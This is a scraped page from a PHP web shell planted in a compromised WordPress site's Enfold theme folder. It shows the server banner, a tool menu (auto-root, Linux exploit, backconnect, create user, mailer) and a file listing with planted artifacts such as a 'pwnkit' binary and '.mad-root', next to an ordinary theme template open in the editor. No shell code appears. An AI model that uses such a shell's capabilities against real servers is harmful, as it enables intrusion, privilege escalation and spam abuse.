Linux webm002.cluster121.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.121.20.2 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
5.4.45
urgencetin
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
urgencetin /
www /
wp-content /
themes /
enfold /
[ HOME SHELL ]
Name
Size
Permission
Action
config-bbpress
[ DIR ]
drwxr-xr-x
config-events-calendar
[ DIR ]
drwxr-xr-x
config-gravityforms
[ DIR ]
drwxr-xr-x
config-layerslider
[ DIR ]
drwxr-xr-x
config-templatebuilder
[ DIR ]
drwxr-xr-x
config-woocommerce
[ DIR ]
drwxr-xr-x
config-wordpress-seo
[ DIR ]
drwxr-xr-x
config-wpml
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
.DS_Store
6
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
404.php
72
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive-more.php
181.05
KB
-rw-r--r--
archive.php
3.12
KB
-rw-r--r--
author.php
1.86
KB
-rw-r--r--
comments.php
4.98
KB
-rw-r--r--
conf.php
26.76
KB
-rw-r--r--
footer.php
6.18
KB
-rw-r--r--
forum.php
1.79
KB
-rw-r--r--
functions-enfold-interface.php
25.92
KB
-rw-r--r--
functions-enfold.php
57.34
KB
-rw-r--r--
functions.php
39.53
KB
-rw-r--r--
functions.php_bak
20.59
KB
-rw-r--r--
functions.txt
20.59
KB
-rw-r--r--
header.php
2.56
KB
-rw-r--r--
index-ajax-response.php
546
B
-rw-r--r--
index.php
2.58
KB
-rw-r--r--
page.php
1.36
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
screenshot.png
144.35
KB
-rw-r--r--
search.php
2.12
KB
-rw-r--r--
searchform.php
1.27
KB
-rw-r--r--
sidebar.php
3.66
KB
-rw-r--r--
single-portfolio.php
1.4
KB
-rw-r--r--
single.php
2.02
KB
-rw-r--r--
style.css
1.16
KB
-rw-r--r--
tag-statement.php
546
B
-rw-r--r--
tag.php
5.98
KB
-rw-r--r--
taxonomy-portfolio_entries.php
1.78
KB
-rw-r--r--
template-archives.php
7.35
KB
-rw-r--r--
template-blank.php
647
B
-rw-r--r--
template-builder.php
2.83
KB
-rw-r--r--
wpml-config.xml
2.24
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tag.php
<?php if ( !defined('ABSPATH') ){ die(); } global $avia_config, $more; /* * get_header is a basic wordpress function, used to retrieve the header.php file in your theme directory. */ get_header(); echo avia_title(array('title' => avia_which_archive())); do_action( 'ava_after_main_title' ); ?> <div class='container_wrap container_wrap_first main_color <?php avia_layout_class( 'main' ); ?>'> <div class='container template-blog '> <main class='content <?php avia_layout_class( 'content' ); ?> units' <?php avia_markup_helper(array('context' => 'content'));?>> <div class="category-term-description"> <?php echo term_description(); ?> </div> <?php global $wp_query, $posts; $backup_query = $wp_query; $sorted = array('post'=>array()); $post_type_obj = array(); foreach($posts as $post) { $sorted[$post->post_type][] = $post; if(empty($post_type_obj[$post->post_type])) { $post_type_obj[$post->post_type] = get_post_type_object($post->post_type); } } $avia_config['blog_style'] = apply_filters('avf_blog_style', avia_get_option('blog_style','multi-big'), 'tag'); if($avia_config['blog_style'] == 'blog-grid') { $output = ''; $post_ids = array(); foreach($posts as $post) $post_ids[] = $post->ID; if(!empty($post_ids)) { echo "<div class='entry-content-wrapper'>"; foreach($sorted as $key => $post_type) { if(empty($post_type)) continue; if(isset($post_type_obj[$key]->labels->name)) { $label = apply_filters('avf_tag_label_names', $post_type_obj[$key]->labels->name); $output .= "<h3 class='post-title tag-page-post-type-title'>".$label."</h3>"; } else { $output .= "<hr />"; } $atts = array( 'type' => 'grid', 'items' => get_option('posts_per_page'), 'columns' => 3, 'class' => 'avia-builder-el-no-sibling', 'paginate' => 'yes', 'use_main_query_pagination' => 'yes', 'custom_query' => array( 'post__in'=>$post_ids, 'post_type'=> $key ) ); $blog = new avia_post_slider($atts); $blog->query_entries(); $output .= $blog->html(); } echo $output; echo '</div>'; } else { get_template_part( 'includes/loop', 'index' ); } } else { foreach($sorted as $key => $post_type) { if(empty($post_type)) continue; if(isset($post_type_obj[$key]->labels->name)) { $label = apply_filters('avf_tag_label_names', $post_type_obj[$key]->labels->name); echo "<h3 class='post-title tag-page-post-type-title'>".$label."</h3>"; } else { echo "<hr />"; } if($key == 'portfolio') { $args = array_merge( $wp_query->query_vars, array( 'post_type' => $key ) ); query_posts( $args ); $grid = new avia_post_grid(array( 'linking' => '', 'columns' => '3', 'contents' => 'title', 'sort' => 'no', 'paginate' => 'yes', 'set_breadcrumb' => false, )); $grid->use_global_query(); echo $grid->html(); } else { $args = array_merge( $wp_query->query_vars, array( 'post_type' => $key ) ); query_posts( $args ); $more = 0; get_template_part( 'includes/loop', 'index' ); } $wp_query = $backup_query; } } ?> <!--end content--> </main> <?php //get the sidebar $avia_config['currently_viewing'] = 'blog'; get_sidebar(); ?> </div><!--end container--> </div><!-- close default .container_wrap element --> <?php get_footer(); ?>
Close